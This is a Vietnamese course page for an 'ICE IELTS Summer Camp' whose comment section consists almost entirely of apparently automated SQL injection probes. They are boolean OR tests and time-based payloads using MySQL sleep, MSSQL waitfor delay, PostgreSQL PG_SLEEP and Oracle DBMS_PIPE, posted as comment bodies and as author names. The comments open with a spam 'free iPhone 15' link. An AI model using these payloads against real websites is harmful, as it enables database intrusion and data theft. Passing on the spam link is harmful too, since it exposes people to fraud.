Nội dung khóa học

KHÓA TRẠI HÈ ICE IELTS SUMMER CAMP

Bình luận “KHÓA TRẠI HÈ ICE IELTS SUMMER CAMP

 1. 🎁 Get free iPhone 15: https://mypcfile.com/uploads/go.php 🎁 hs=41756c3345ffbcdacb7748d4b09c4ab9* viết:
  pcpt8g
  1. MmzHrrdb viết:
   D2DhK4m5
  2. MmzHrrdb viết:
   -1 OR 2+425-425-1=0+0+0+1 --
  3. MmzHrrdb viết:
   -1 OR 2+495-495-1=0+0+0+1
  4. MmzHrrdb viết:
   -1' OR 2+596-596-1=0+0+0+1 --
  5. MmzHrrdb viết:
   -1' OR 2+267-267-1=0+0+0+1 or 'R3mM1xmv'='
  6. MmzHrrdb viết:
   -1" OR 2+309-309-1=0+0+0+1 --
  7. MmzHrrdb viết:
   if(now()=sysdate(),sleep(15),0)
  8. MmzHrrdb viết:
   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  9. MmzHrrdb viết:
   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  10. MmzHrrdb viết:
   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  11. MmzHrrdb viết:
   -1; waitfor delay '0:0:15' --
  12. MmzHrrdb viết:
   -1); waitfor delay '0:0:15' --
  13. MmzHrrdb viết:
   1 waitfor delay '0:0:15' --
  14. MmzHrrdb viết:
   MMq8xSbM'; waitfor delay '0:0:15' --
  15. MmzHrrdb viết:
   -5 OR 563=(SELECT 563 FROM PG_SLEEP(15))--
  16. MmzHrrdb viết:
   -5) OR 317=(SELECT 317 FROM PG_SLEEP(15))--
  17. MmzHrrdb viết:
   -1)) OR 518=(SELECT 518 FROM PG_SLEEP(15))--
  18. MmzHrrdb viết:
   CrvXZE8W' OR 471=(SELECT 471 FROM PG_SLEEP(15))--
  19. MmzHrrdb viết:
   vTN6wy15') OR 933=(SELECT 933 FROM PG_SLEEP(15))--
  20. MmzHrrdb viết:
   bQYtNW0U')) OR 559=(SELECT 559 FROM PG_SLEEP(15))--
  21. MmzHrrdb viết:
   555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  22. MmzHrrdb viết:
   555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  23. MmzHrrdb viết:
   @@LjBWG
  24. -1 OR 2+560-560-1=0+0+0+1 -- viết:
   555
  25. -1 OR 2+906-906-1=0+0+0+1 viết:
   555
  26. -1' OR 2+263-263-1=0+0+0+1 -- viết:
   555
  27. -1' OR 2+841-841-1=0+0+0+1 or 'yPh6MO0d'=' viết:
   555
  28. -1" OR 2+120-120-1=0+0+0+1 -- viết:
   555
  29. if(now()=sysdate(),sleep(15),0) viết:
   555
  30. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  31. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  32. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  33. 1 waitfor delay '0:0:15' -- viết:
   555
  34. j0psWmc8'; waitfor delay '0:0:15' -- viết:
   555
  35. lieQhCYY' OR 77=(SELECT 77 FROM PG_SLEEP(15))-- viết:
   555
  36. Q5K39Nsv') OR 824=(SELECT 824 FROM PG_SLEEP(15))-- viết:
   555
  37. 4YlEIN7q')) OR 304=(SELECT 304 FROM PG_SLEEP(15))-- viết:
   555
  38. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555
  39. MmzHrrdb viết:
   OE9jDtcE
  40. MmzHrrdb viết:
   -1 OR 2+913-913-1=0+0+0+1 --
  41. MmzHrrdb viết:
   -1 OR 2+789-789-1=0+0+0+1
  42. MmzHrrdb viết:
   -1' OR 2+548-548-1=0+0+0+1 --
  43. MmzHrrdb viết:
   -1' OR 2+94-94-1=0+0+0+1 or 'NijNz3dK'='
  44. MmzHrrdb viết:
   -1" OR 2+475-475-1=0+0+0+1 --
  45. MmzHrrdb viết:
   if(now()=sysdate(),sleep(15),0)
  46. MmzHrrdb viết:
   0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  47. MmzHrrdb viết:
   0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  48. MmzHrrdb viết:
   (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  49. MmzHrrdb viết:
   -1; waitfor delay '0:0:15' --
  50. MmzHrrdb viết:
   -1); waitfor delay '0:0:15' --
  51. MmzHrrdb viết:
   1 waitfor delay '0:0:15' --
  52. MmzHrrdb viết:
   X44a5sJe'; waitfor delay '0:0:15' --
  53. MmzHrrdb viết:
   -5 OR 146=(SELECT 146 FROM PG_SLEEP(15))--
  54. MmzHrrdb viết:
   -5) OR 145=(SELECT 145 FROM PG_SLEEP(15))--
  55. MmzHrrdb viết:
   -1)) OR 622=(SELECT 622 FROM PG_SLEEP(15))--
  56. MmzHrrdb viết:
   B7WkB9Wl' OR 338=(SELECT 338 FROM PG_SLEEP(15))--
  57. MmzHrrdb viết:
   eOJEQd5b') OR 284=(SELECT 284 FROM PG_SLEEP(15))--
  58. MmzHrrdb viết:
   YPFodpJp')) OR 486=(SELECT 486 FROM PG_SLEEP(15))--
  59. MmzHrrdb viết:
   555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
  60. MmzHrrdb viết:
   555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  61. MmzHrrdb viết:
   @@RvdxB
  62. -1 OR 2+882-882-1=0+0+0+1 -- viết:
   555
  63. -1 OR 2+45-45-1=0+0+0+1 viết:
   555
  64. -1' OR 2+174-174-1=0+0+0+1 -- viết:
   555
  65. -1' OR 2+52-52-1=0+0+0+1 or 'K1h9QpJh'=' viết:
   555
  66. -1" OR 2+527-527-1=0+0+0+1 -- viết:
   555
  67. if(now()=sysdate(),sleep(15),0) viết:
   555
  68. 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z viết:
   555
  69. 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z viết:
   555
  70. (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ viết:
   555
  71. 1 waitfor delay '0:0:15' -- viết:
   555
  72. 9q5cMXBe'; waitfor delay '0:0:15' -- viết:
   555
  73. YWateF9l' OR 231=(SELECT 231 FROM PG_SLEEP(15))-- viết:
   555
  74. Xa8KH7u3') OR 577=(SELECT 577 FROM PG_SLEEP(15))-- viết:
   555
  75. CPacpFDH')) OR 185=(SELECT 185 FROM PG_SLEEP(15))-- viết:
   555
  76. MmzHrrdb'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' viết:
   555